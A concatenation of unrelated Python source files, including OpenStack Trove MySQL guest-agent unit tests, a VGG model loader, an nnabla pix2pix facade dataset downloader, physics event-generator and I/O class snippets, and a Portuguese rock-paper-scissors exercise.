self.manager.list_users(self.context) self.assertThat(users, Equals(list_users_mock.return_value)) dbaas.MySqlAdmin.list_users.assert_any_call(None, None, False) @patch.object(dbaas.MySqlAdmin, 'get_user', return_value=['user1']) def test_get_users(self, get_user_mock): username = ['user1'] hostname = ['host'] users = self.manager.get_user(self.context, username, hostname) self.assertThat(users, Equals(get_user_mock.return_value)) get_user_mock.assert_any_call(username, hostname) @patch.object(dbaas.MySqlAdmin, 'enable_root', return_value='user_id_stuff') def test_enable_root(self, enable_root_mock): user_id = self.manager.enable_root(self.context) self.assertThat(user_id, Is(enable_root_mock.return_value)) enable_root_mock.assert_any_call() @patch.object(dbaas.MySqlAdmin, 'disable_root') def test_disable_root(self, disable_root_mock): self.manager.disable_root(self.context) disable_root_mock.assert_any_call() @patch.object(dbaas.MySqlAdmin, 'is_root_enabled', return_value=True) def test_is_root_enabled(self, is_root_enabled_mock): is_enabled = self.manager.is_root_enabled(self.context) self.assertThat(is_enabled, Is(is_root_enabled_mock.return_value)) is_root_enabled_mock.assert_any_call() @patch.object(backup, 'backup') def test_create_backup(self, backup_mock): # entry point Manager().create_backup(self.context, 'backup_id_123') # assertions backup_mock.assert_any_call(self.context, 'backup_id_123') def test_prepare_device_path_true(self): self._prepare_dynamic() def test_prepare_device_path_false(self): self._prepare_dynamic(device_path=None) def test_prepare_device_path_mounted(self): self._prepare_dynamic(is_mounted=True) def test_prepare_mysql_not_installed(self): self._prepare_dynamic(is_mysql_installed=False) def test_prepare_mysql_from_backup(self): self._prepare_dynamic(backup_id='backup_id_123abc') def test_prepare_mysql_from_backup_with_root(self): self._prepare_dynamic(backup_id='backup_id_123abc', is_root_enabled=True) def test_prepare_mysql_with_root_password(self): self._prepare_dynamic(root_password='') def test_prepare_mysql_with_users_and_databases(self): self._prepare_dynamic(databases=['db1'], users=['user1']) def test_prepare_mysql_with_snapshot(self): snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': 1.0}, 'config': None} total_size = snapshot['dataset']['dataset_size'] + 1 self.mock_gfvs_class.return_value = {'total': total_size} self._prepare_dynamic(snapshot=snapshot) @patch.multiple(dbaas.MySqlAdmin, create_user=DEFAULT, create_database=DEFAULT, enable_root=DEFAULT) @patch.object(backup, 'restore') def _prepare_dynamic(self, restore_mock, create_user, create_database, enable_root, device_path='/dev/vdb', is_mysql_installed=True, backup_id=None, is_root_enabled=False, root_password=, overrides=None, is_mounted=False, databases=None, users=None, snapshot=None): # covering all outcomes is starting to cause trouble here COUNT = 1 if device_path else 0 backup_info = None if backup_id is not None: backup_info = {'id': backup_id, 'location': 'fake-location', 'type': 'InnoBackupEx', 'checksum': 'fake-checksum', } # TODO(juice): this should stub an instance of the MySqlAppStatus mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) mock_status.begin_install = MagicMock(return_value=None) VolumeDevice.format = MagicMock(return_value=None) VolumeDevice.migrate_data = MagicMock(return_value=None) VolumeDevice.mount = MagicMock(return_value=None) mount_points = [] if is_mounted: mount_points = ['/mnt'] VolumeDevice.mount_points = MagicMock(return_value=mount_points) VolumeDevice.unmount = MagicMock(return_value=None) set_data_dir_patcher = patch.object(dbaas.MySqlApp, 'set_data_dir', return_value='/var/lib/mysql') self.addCleanup(set_data_dir_patcher.stop) set_data_dir_patcher.start() dbaas.MySqlApp.stop_db = MagicMock(return_value=None) dbaas.MySqlApp.start_mysql = MagicMock(return_value=None) dbaas.MySqlApp.update_overrides = MagicMock(return_value=None) dbaas.MySqlApp.install_if_needed = MagicMock(return_value=None) dbaas.MySqlApp.secure = MagicMock(return_value=None) dbaas.MySqlApp.secure_root = MagicMock(return_value=None) pkg.Package.pkg_is_installed = MagicMock( return_value=is_mysql_installed) operating_system.chown = MagicMock(return_value=None) os.path.exists = MagicMock(return_value=True) mock_replication = MagicMock() mock_replication.enable_as_slave = MagicMock() self.mock_rs_class.return_value = mock_replication with patch.object(dbaas.MySqlAdmin, 'is_root_enabled', return_value=is_root_enabled): self.manager.prepare(context=self.context, packages=None, memory_mb='2048', databases=databases, users=users, device_path=device_path, mount_point='/var/lib/mysql', backup_info=backup_info, root_password=, overrides=overrides, cluster_config=None, snapshot=snapshot) # verification/assertion mock_status.begin_install.assert_any_call() self.assertEqual(COUNT, VolumeDevice.format.call_count) self.assertEqual(COUNT, VolumeDevice.migrate_data.call_count) self.assertEqual(COUNT, VolumeDevice.mount_points.call_count) self.assertEqual(COUNT, dbaas.MySqlApp.stop_db.call_count) if is_mounted: self.assertEqual(1, VolumeDevice.unmount.call_count) else: self.assertEqual(0, VolumeDevice.unmount.call_count) if backup_info: restore_mock.assert_any_call(self.context, backup_info, '/var/lib/mysql/data') dbaas.MySqlApp.install_if_needed.assert_any_call(None) # We don't need to make sure the exact contents are there dbaas.MySqlApp.secure.assert_any_call(None) dbaas.MySqlApp.secure_root.assert_any_call( secure_remote_root=not is_root_enabled) if root_password: dbaas.MySqlAdmin.enable_root.assert_any_call(root_password) if databases: dbaas.MySqlAdmin.create_database.assert_any_call(databases) else: self.assertFalse(dbaas.MySqlAdmin.create_database.called) if users: dbaas.MySqlAdmin.create_user.assert_any_call(users) else: self.assertFalse(dbaas.MySqlAdmin.create_user.called) if snapshot: self.assertEqual(1, mock_replication.enable_as_slave.call_count) else: self.assertEqual(0, mock_replication.enable_as_slave.call_count) def test_get_replication_snapshot(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) snapshot_id = 'my_snapshot_id' log_position = 123456789 master_ref = 'my_master' used_size = 1.0 total_size = 2.0 mock_replication = MagicMock() mock_replication.enable_as_master = MagicMock() mock_replication.snapshot_for_replication = MagicMock( return_value=(snapshot_id, log_position)) mock_replication.get_master_ref = MagicMock( return_value=master_ref) self.mock_rs_class.return_value = mock_replication self.mock_gfvs_class.return_value = ( {'used': used_size, 'total': total_size}) expected_replication_snapshot = { 'dataset': { 'datastore_manager': self.manager.manager, 'dataset_size': used_size, 'volume_size': total_size, 'snapshot_id': snapshot_id }, 'replication_strategy': self.replication_strategy, 'master': master_ref, 'log_position': log_position } snapshot_info = None replica_source_config = None # entry point replication_snapshot = ( self.manager.get_replication_snapshot(self.context, snapshot_info, replica_source_config)) # assertions self.assertEqual(expected_replication_snapshot, replication_snapshot) self.assertEqual(1, mock_replication.enable_as_master.call_count) self.assertEqual( 1, mock_replication.snapshot_for_replication.call_count) self.assertEqual(1, mock_replication.get_master_ref.call_count) def test_attach_replication_slave_valid(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) total_size = 2.0 dataset_size = 1.0 mock_replication = MagicMock() mock_replication.enable_as_slave = MagicMock() self.mock_rs_class.return_value = mock_replication self.mock_gfvs_class.return_value = {'total': total_size} snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': dataset_size}} # entry point self.manager.attach_replica(self.context, snapshot, None) # assertions self.assertEqual(1, mock_replication.enable_as_slave.call_count) @patch('trove.guestagent.datastore.mysql_common.manager.LOG') def test_attach_replication_slave_invalid(self, *args): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) total_size = 2.0 dataset_size = 3.0 mock_replication = MagicMock() mock_replication.enable_as_slave = MagicMock() self.mock_rs_class.return_value = mock_replication self.mock_gfvs_class.return_value = {'total': total_size} snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': dataset_size}} # entry point self.assertRaises(InsufficientSpaceForReplica, self.manager.attach_replica, self.context, snapshot, None) # assertions self.assertEqual(0, mock_replication.enable_as_slave.call_count) def test_detach_replica(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) mock_replication = MagicMock() mock_replication.detach_slave = MagicMock() self.mock_rs_class.return_value = mock_replication # entry point self.manager.detach_replica(self.context) # assertions self.assertEqual(1, mock_replication.detach_slave.call_count) def test_demote_replication_master(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) mock_replication = MagicMock() mock_replication.demote_master = MagicMock() self.mock_rs_class.return_value = mock_replication # entry point self.manager.demote_replication_master(self.context) # assertions self.assertEqual(1, mock_replication.demote_master.call_count) def test_get_master_UUID(self): app = dbaas.MySqlApp(None) def test_case(slave_status, expected_value): with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value=slave_status): assert_equal(app._get_master_UUID(), expected_value) test_case({'Master_UUID': '2a5b-2064-32fb'}, '2a5b-2064-32fb') test_case({'Master_UUID': ''}, None) test_case({}, None) def test_get_last_txn(self): def test_case(gtid_list, expected_value): with patch.object(dbaas.MySqlApp, '_get_gtid_executed', return_value=gtid_list): txn = self.manager.get_last_txn(self.context) assert_equal(txn, expected_value) with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value={'Master_UUID': '2a5b-2064-32fb'}): test_case('2a5b-2064-32fb:1', ('2a5b-2064-32fb', 1)) test_case('2a5b-2064-32fb:1-5', ('2a5b-2064-32fb', 5)) test_case('2a5b-2064-32fb:1,4b4-23:5', ('2a5b-2064-32fb', 1)) test_case('4b4-23:5,2a5b-2064-32fb:1', ('2a5b-2064-32fb', 1)) test_case('4b-23:5,2a5b-2064-32fb:1,25:3-4', ('2a5b-2064-32fb', 1)) test_case('4b4-23:1-5,2a5b-2064-32fb:1-10', ('2a5b-2064-32fb', 10)) with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value={'Master_UUID': ''}): test_case('2a5b-2064-32fb:1', (None, 0)) with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value={}): test_case('2a5b-2064-32fb:1', (None, 0)) def test_rpc_ping(self): self.assertTrue(self.manager.rpc_ping(self.context)) @patch.object(dbaas.MySqlAdmin, 'change_passwords') def test_change_passwords(self, change_passwords_mock): self.manager.change_passwords( self.context, [{'name': 'test_user', 'password': ''}]) change_passwords_mock.assert_any_call( [{'name': 'test_user', 'password': ''}]) @patch.object(dbaas.MySqlAdmin, 'update_attributes') def test_update_attributes(self, update_attr_mock): self.manager.update_attributes(self.context, 'test_user', '%', {'password': ''}) update_attr_mock.assert_any_call('test_user', '%', {'password': ''}) @patch.object(dbaas.MySqlApp, 'reset_configuration') def test_reset_configuration(self, reset_config_mock): dbaas.MySqlAppStatus.get = MagicMock(return_value=MagicMock()) configuration = {'config_contents': 'some junk'} self.manager.reset_configuration(self.context, configuration) dbaas.MySqlAppStatus.get.assert_any_call() reset_config_mock.assert_any_call({'config_contents': 'some junk'}) @patch.object(dbaas.MySqlAdmin, 'revoke_access') def test_revoke_access(self, revoke_access_mock): self.manager.revoke_access(self.context, 'test_user', '%', 'test_db') revoke_access_mock.assert_any_call('test_user', '%', 'test_db') @patch.object(dbaas.MySqlAdmin, 'list_access', return_value=['database1']) def test_list_access(self, list_access_mock): access = self.manager.list_access(self.context, 'test_user', '%') self.assertEqual(list_access_mock.return_value, access) list_access_mock.assert_any_call('test_user', '%') @patch.object(dbaas.MySqlApp, 'restart') def test_restart(self, restart_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.restart(self.context) dbaas.MySqlAppStatus.get.assert_any_call() restart_mock.assert_any_call() @patch.object(dbaas.MySqlApp, 'start_db_with_conf_changes') def test_start_db_with_conf_changes(self, start_db_mock): mock_status = MagicMock() configuration = {'config_contents': 'some junk'} self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.start_db_with_conf_changes(self.context, configuration) dbaas.MySqlAppStatus.get.assert_any_call() start_db_mock.assert_any_call({'config_contents': 'some junk'}) def test_stop_db(self): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) dbaas.MySqlApp.stop_db = MagicMock(return_value=None) self.manager.stop_db(self.context) dbaas.MySqlAppStatus.get.assert_any_call() dbaas.MySqlApp.stop_db.assert_any_call(do_not_start_on_reboot=False) def test_get_filesystem_stats(self): with patch.object(base_dbaas, 'get_filesystem_volume_stats'): self.manager.get_filesystem_stats(self.context, '/var/lib/mysql') base_dbaas.get_filesystem_volume_stats.assert_any_call( '/var/lib/mysql') def test_mount_volume(self): with patch.object(volume.VolumeDevice, 'mount', return_value=None): self.manager.mount_volume(self.context, device_path='/dev/vdb', mount_point='/var/lib/mysql') test_mount = volume.VolumeDevice.mount.call_args_list[0] test_mount.assert_called_with('/var/lib/mysql', False) def test_unmount_volume(self): with patch.object(volume.VolumeDevice, 'unmount', return_value=None): self.manager.unmount_volume(self.context, device_path='/dev/vdb') test_unmount = volume.VolumeDevice.unmount.call_args_list[0] test_unmount.assert_called_with('/var/lib/mysql') def test_resize_fs(self): with patch.object(volume.VolumeDevice, 'resize_fs', return_value=None): self.manager.resize_fs(self.context, device_path='/dev/vdb') test_resize_fs = volume.VolumeDevice.resize_fs.call_args_list[0] test_resize_fs.assert_called_with('/var/lib/mysql') @patch.object(dbaas.MySqlApp, 'remove_overrides') def test_update_overrides(self, remove_config_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) dbaas.MySqlApp.update_overrides = MagicMock(return_value=None) self.manager.update_overrides(self.context, 'something_overrides') dbaas.MySqlAppStatus.get.assert_any_call() remove_config_mock.assert_not_called() dbaas.MySqlApp.update_overrides.assert_any_call('something_overrides') @patch.object(dbaas.MySqlApp, 'remove_overrides') def test_update_overrides_with_remove(self, remove_overrides_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) dbaas.MySqlApp.update_overrides = MagicMock(return_value=None) self.manager.update_overrides(self.context, 'something_overrides', True) dbaas.MySqlAppStatus.get.assert_any_call() remove_overrides_mock.assert_any_call() dbaas.MySqlApp.update_overrides.assert_any_call('something_overrides') @patch.object(dbaas.MySqlApp, 'apply_overrides') def test_apply_overrides(self, apply_overrides_mock): mock_status = MagicMock() override = {'some_key': 'some value'} self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.apply_overrides(self.context, override) dbaas.MySqlAppStatus.get.assert_any_call() apply_overrides_mock.assert_any_call({'some_key': 'some value'}) @patch.object(dbaas.MySqlApp, 'get_txn_count', return_value=(9879)) def test_get_txn_count(self, get_txn_count_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) txn_count = self.manager.get_txn_count(self.context) self.assertEqual(get_txn_count_mock.return_value, txn_count) dbaas.MySqlAppStatus.get.assert_any_call() get_txn_count_mock.assert_any_call() @patch.object(dbaas.MySqlApp, 'get_latest_txn_id', return_value=('2a5b-2064-32fb:1')) def test_get_latest_txn_id(self, get_latest_txn_id_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) latest_txn_id = self.manager.get_latest_txn_id(self.context) self.assertEqual(get_latest_txn_id_mock.return_value, latest_txn_id) dbaas.MySqlAppStatus.get.assert_any_call() get_latest_txn_id_mock.assert_any_call() @patch.object(dbaas.MySqlApp, 'wait_for_txn') def test_wait_for_txn(self, wait_for_txn_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.wait_for_txn(self.context, '4b4-23:5,2a5b-2064-32fb:1') dbaas.MySqlAppStatus.get.assert_any_call() wait_for_txn_mock.assert_any_call('4b4-23:5,2a5b-2064-32fb:1') @patch.object(dbaas.MySqlApp, 'make_read_only') def test_make_read_only(self, make_read_only_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.make_read_only(self.context, 'ON') dbaas.MySqlAppStatus.get.assert_any_call() make_read_only_mock.assert_any_call('ON') def test_cleanup_source_on_replica_detach(self): mock_replication = MagicMock() mock_replication.cleanup_source_on_replica_detach = MagicMock() self.mock_rs_class.return_value = mock_replication snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': '1.0'}} # entry point self.manager.cleanup_source_on_replica_detach(self.context, snapshot) # assertions self.assertEqual( 1, mock_replication.cleanup_source_on_replica_detach.call_count) def test_get_replica_context(self): replication_user = { 'name': 'repl_user', 'password': '' } master_ref = { 'host': '1.2.3.4', 'port': 3306 } rep_info = { 'master': master_ref, 'log_position': { 'replication_user': replication_user } } mock_replication = MagicMock() mock_replication.get_replica_context = MagicMock(return_value=rep_info) self.mock_rs_class.return_value = mock_replication # entry point replica_info = self.manager.get_replica_context(self.context) # assertions self.assertEqual(1, mock_replication.get_replica_context.call_count) self.assertEqual(rep_info, replica_info) def test_enable_as_master(self): mock_replication = MagicMock() mock_replication.enable_as_master = MagicMock() self.mock_rs_class.return_value = mock_replication # entry point self.manager.enable_as_master(self.context, None) # assertions self.assertEqual(mock_replication.enable_as_master.call_count, 1) @patch('trove.guestagent.datastore.mysql_common.manager.LOG') def test__perform_restore(self, *args): backup_info = {'id': 'backup_id_123abc', 'location': 'fake-location', 'type': 'InnoBackupEx', 'checksum': 'fake-checksum', } mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) app = dbaas.MySqlApp(dbaas.MySqlAppStatus.get()) with patch.object(backup, 'restore', side_effect=ProcessExecutionError): self.assertRaises(ProcessExecutionError, self.manager._perform_restore, backup_info, self.context, '/var/lib/mysql', app) app.status.set_status.assert_called_with( rd_instance.ServiceStatuses.FAILED) def program1(x): total = 0 for i in range(1000): total += i while x > 0: x -= 1 total += x return total print(program1(0))#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: zcy # @Date: 2019-01-13 16:54:20 # @Last Modified by: zcy # @Last Modified time: 2019-02-11 11:52:32 import logging # 引入logging模块 import os import torch.utils.model_zoo as model_zoo from torch import load as TorchLoad from models.classifiers.Vgg_module import vgg_Net # python语法:限制允许从本模块导入的东西 __all__ = [ 'vgg11', 'vgg13', 'vgg16', 'vgg19' ] # 预训练模型的下载地址 # 只要带有bn的 model_urls = { 'vgg11': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth', 'vgg13': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth', 'vgg16': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth', 'vgg19': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth', } model_names = { 'vgg11': 'vgg11_bn-6002323d.pth', 'vgg13': 'vgg13_bn-abd245e5.pth', 'vgg16': 'vgg16_bn-6c64b313.pth', 'vgg19': 'vgg19_bn-c79401a0.pth', } ''' 记录了不同的vgg结构 number: convolution layer's output channel 'M': MaxPool layer ''' vgg_cfg = { 'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'], 'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'], } def isValidParam(param): ''' check param is valid or not ''' if param['img_height']%32!=0: logging.info("图片长宽应该设定为32的倍数,比如32 64 512这样的值,可是现在却是 %d " %param['img_height']) logging.error("images height must be 32's multiple, but you set it to %d " %param['img_height']) return False if param['img_width']%32!=0: logging.info("图片长宽应该设定为32的倍数,比如32 64 512这样的值,可是现在却是 %d " %param['img_width']) logging.error(" images width must be 32's multiple, but you set it to %d " %param['img_width']) return False return True def check_param(param): if not isValidParam(param): raise RuntimeError('Error in parameter setting') def get_vgg(Net_cfg, Net_urls, file_name, n_class, pretrained=False, img_size=(224, 224), pretrained_path="./pretrained/"): ''' Net_cfg:网络结构 Net_urls:预训练模型的url file_name:预训练模型的名字 n_class:输出类别 pretrained:是否使用预训练模型 param为字典,包含网络需要的参数 param['img_height']: image's height, must be 32's multiple param['img_width']: image's weight, must be 32's multiple ''' if isinstance(img_size, (tuple, list)): h, w = img_size[0], img_size[1] else: h = w = img_size param = {'img_height':h, 'img_width':w} check_param(param) model = vgg_Net(Net_cfg, param) #先建立一个跟预训练模型一样的网络 model.img_size = (h, w) if pretrained: if os.path.exists(os.path.join(pretrained_path, file_name)): model.load_state_dict(TorchLoad(os.path.join(pretrained_path, file_name))) logging.info("Find local model file, load model from local !!") logging.info("找到本地下载的预训练模型!!直接载入!!") else: logging.info("pretrained 文件夹下没有,从网上下载 !!") model.load_state_dict(model_zoo.load_url(Net_urls, model_dir = pretrained_path)) logging.info("下载完毕!!载入权重!!") model.adjust_classifier(n_class) #调整全连接层,迁移学习 return model def vgg11(n_class, img_size=(224, 224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['A'], model_urls['vgg11'], model_names['vgg11'], n_class, pretrained, img_size, pretrained_path) def vgg13(n_class, img_size=(224, 224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['B'], model_urls['vgg13'], model_names['vgg13'], n_class, pretrained, img_size, pretrained_path) def vgg16(n_class, img_size=(224, 224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['D'], model_urls['vgg16'], model_names['vgg16'], n_class, pretrained, img_size, pretrained_path) def vgg19(n_class, img_size=(224, 224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['E'], model_urls['vgg19'], model_names['vgg19'], n_class, pretrained, img_size, pretrained_path) k = int(input()) l = int(input()) m = int(input()) n = int(input()) d = int(input()) count = d for i in range(d, -1, -1): if ((i % k != 0) and (i % l != 0) and (i % m != 0) and (i % n != 0)): count -= 1 print(count) JonathanLehner/nnabla-examplesGANs/pix2pix/facade.py # Copyright (c) 2017 Sony Corporation. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import glob import shutil import numpy as np import six import urllib.request as request import tqdm import zipfile from PIL import Image import nnabla.logger as logger from nnabla.utils.data_iterator import data_iterator from nnabla.utils.data_source import DataSource class FacadeDataSource(DataSource): DATASET_NAME = 'facades' URLs = ['http://cmp.felk.cvut.cz/~tylecr1/facade/CMP_facade_DB_base.zip', 'http://cmp.felk.cvut.cz/~tylecr1/facade/CMP_facade_DB_extended.zip'] DEFAULT_DATASET_ROOT_PATH = './datasets' DEFAULT_TRAIN_ROOT_PATH = DEFAULT_DATASET_ROOT_PATH + '/' + DATASET_NAME + '/train' DEFAULT_VAL_ROOT_PATH = DEFAULT_DATASET_ROOT_PATH + '/' + DATASET_NAME + '/val' DEFAULT_TEST_ROOT_PATH = DEFAULT_DATASET_ROOT_PATH + '/' + DATASET_NAME + '/test' def __init__(self, images_root_path=None, cropsize=(256, 256), random_crop=True, shuffle=True, rng=None): super(FacadeDataSource, self).__init__(shuffle=shuffle, rng=rng) if images_root_path is None: images_root_path = FacadeDataSource.DEFAULT_TRAIN_ROOT_PATH if not os.path.exists(images_root_path): self.download() self._facade_images = glob.glob(images_root_path + '/*.jpg') self._crop_size = cropsize self._random_crop = random_crop self._size = len(self._facade_images) self._variables = ('x', 'y') # should be defined self.reset() # should be called def download(self, train=400, val=100): # Load Facade Image Data facade_raw = os.path.join( FacadeDataSource.DEFAULT_DATASET_ROOT_PATH, FacadeDataSource.DATASET_NAME, 'raw') if (not os.path.exists(FacadeDataSource.DEFAULT_TRAIN_ROOT_PATH) or not os.path.exists(FacadeDataSource.DEFAULT_VAL_ROOT_PATH) or not os.path.exists(FacadeDataSource.DEFAULT_TEST_ROOT_PATH)): # Make Default Dataset Root Directory if not os.path.exists(FacadeDataSource.DEFAULT_DATASET_ROOT_PATH): os.makedirs(FacadeDataSource.DEFAULT_DATASET_ROOT_PATH) # Download for url in FacadeDataSource.URLs: logger.info('Downloading Dataset from {0:s}...'.format(url)) download_path = os.path.join( FacadeDataSource.DEFAULT_DATASET_ROOT_PATH, os.path.basename(url)) # Make Download Progress Bar tsize = int(request.urlopen(url).headers.get('Content-Length')) with tqdm.tqdm(total=tsize) as bar: def update_bar(bcount, bsize, total, bar=bar): return bar.update( bsize) six.moves.urllib.request.urlretrieve( url, download_path, reporthook=update_bar) # Extract Dataset with zipfile.ZipFile(download_path, 'r') as zfile: zfile.extractall(path=facade_raw) # split into train/val/test dataset image_paths = [] for d in [_d for _d in glob.glob(facade_raw+'/*') if os.path.isdir(_d)]: image_paths.extend(glob.glob(d + '/*.jpg')) self._rng.shuffle(image_paths) test = len(image_paths) - \ (train + val) if len(image_paths) > (train + val) else 0 for n, d in zip( [train, val, test], [FacadeDataSource.DEFAULT_TRAIN_ROOT_PATH, FacadeDataSource.DEFAULT_VAL_ROOT_PATH, FacadeDataSource.DEFAULT_TEST_ROOT_PATH]): if not os.path.exists(d): os.makedirs(d) for i in range(n): image_p = image_paths.pop() label_p = os.path.splitext(image_p)[0] + '.png' shutil.copy(image_p, d) shutil.copy(label_p, d) else: logger.info('Facade Dataset is already downloaded.') def _get_data(self, position): # Load from Filename idx = self._indexes[position] label_name = os.path.splitext(self._facade_images[idx])[0] + '.png' image = Image.open(self._facade_images[idx]) _label = Image.open(label_name) # Resize Images w, h = image.size r = 286. / min(w, h) image = image.resize((int(r*w), int(r*h)), Image.BILINEAR) image = np.asarray(image).astype('f').transpose(2, 0, 1) _label = _label.resize((int(r*w), int(r*h)), Image.NEAREST) _label = np.asarray(_label) - 1 # Normalize Image image = image / 128.0 - 1.0 # random crop c, h, w = image.shape ch, cw = self._crop_size top_left = (self._rng.randint(0, h-ch), self._rng.randint(0, w-cw)) if self._random_crop else (0, 0) image = image[:, top_left[0]:top_left[0] + ch, top_left[1]:top_left[1]+cw] _label = _label[top_left[0]:top_left[0]+ch, top_left[1]:top_left[1]+cw] # Make Label Image label = np.zeros((12, image.shape[1], image.shape[2])).astype("i") for i in range(12): label[i, :] = _label == i return (image, label) def reset(self): # reset method initialize self._indexes if self._shuffle: self._indexes = self._rng.permutation(self._size) else: self._indexes = np.arange(self._size) super(FacadeDataSource, self).reset() def facade_data_iterator( images_root_path, batch_size, random_crop=True, shuffle=True, rng=None, with_memory_cache=True, with_file_cache=False): return data_iterator(FacadeDataSource(images_root_path, random_crop=random_crop, shuffle=shuffle, rng=rng), batch_size, rng, with_memory_cache, with_file_cache) kotania/impy import sys import os import numpy as np root_dir = os.path.abspath(os.path.dirname(__file__)) sys.path.append(root_dir) sys.path.append(os.path.join(root_dir, '../DPMJET-III-gitlab')) from impy.definitions import * from impy.constants import * from impy.kinematics import EventKinematics from impy import impy_config, pdata # AF: This is what the user interaction has to yield. # It is the typical expected configuration that one # wants to run (read pp-mode at energies not exceeding # 7 TeV). If you want cosmic ray energies, this should # be rather p-N at 10 EeV and lab frame (not yet defined). event_kinematics = EventKinematics(ecm=7000 * GeV, p1pdg=2212, p2pdg=2212 # nuc2_prop=(14,7) ) impy_config["user_frame"] = 'laboratory' generator = make_generator_instance(interaction_model_by_tag['SIBYLL23C']) generator.init_generator(event_kinematics) # import IPython # IPython.embed() # This for event in generator.event_generator(event_kinematics, 2): # generator.lib.pydat3.mdcy[102 - 1, 0] = 1 import IPython IPython.embed() event.filter_final_state_charged() # print 'px', event.px # print 'py', event.py # print 'pz', event.pz # print 'en', event.en print 'p_ids', event.p_ids # print 'impact param', event.impact_parameter from controlpyweb.io_definitions.single_io import SingleIO from controlpyweb.io_definitions.io_out import IOOut from controlpyweb.abstract_reader_writer import AbstractReaderWriter class AnalogIn(SingleIO): def __init__(self, name: str, addr: str, default: float = 0.0, reader: AbstractReaderWriter = None, *args, **kwargs): super().__init__(name, addr, default, reader, *args, **kwargs) @staticmethod def _convert_type(value): return float(value) def __mod__(self, other): if hasattr(other, 'value'): other = other.value return self.value % other class AnalogOut(IOOut, AnalogIn): def __init__(self, name: str, addr: str, default: float = 0.0, reader: AbstractReaderWriter = None, *args, **kwargs): super().__init__(name, addr, default, reader, *args, **kwargs) @staticmethod def _convert_type(value): return float(value) def __mod__(self, other): if hasattr(other, 'value'): other = other.value return self.value % other1-10 #Exercício Python 45: Crie um programa que faça o computador jogar Jokenpô com você. from random import randint from time import sleep escolha = ['Pedra', 'Papel', 'Tesoura'] computador = randint(0, 2) jogador = int(input("""Jogue: [ 1 ] - Pedra [ 2 ] - Papel [ 3 ] - Tesoura """)) - 1 print("JO") sleep(1) print("KEN") sleep(1) print("PO") sleep(1) if computador == 0: if jogador == 0: print(f"Empate! {escolha[computador]} x {escolha[jogador]}") elif jogador == 1: print(f"Jogador ganhou! {escolha[computador]} é coberta pelo {escolha[jogador]}") elif jogador == 2: print(f"Computador ganhou! {escolha[computador]} quebra {escolha[jogador]}") elif computador == 1: if jogador == 0: print(f"Computador ganhou! {escolha[computador]} cobre {escolha[jogador]}") elif jogador == 1: print(f"Empate! {escolha[computador]} x {escolha[jogador]}") elif jogador == 2: print(f"Jogador ganhou! {escolha[computador]} é cortado pela {escolha[jogador]}") elif computador == 2: if jogador == 0: print(f"Jogador ganhou! {escolha[computador]} é quebrada pela {escolha[jogador]}") elif jogador == 1: print(f"Computador ganhou! {escolha[computador]} corta {escolha[jogador]}") elif jogador == 2: print(f"Empate! {escolha[computador]} x {escolha[jogador]}") else: print("Opção inválida:") 10-100 import tbapy import datetime # This key should ONLY be used for this example. If using this library in your own project, # follow the steps in the README to generate your own key. tba = tbapy.TBA('') team = tba.team(254) districts, 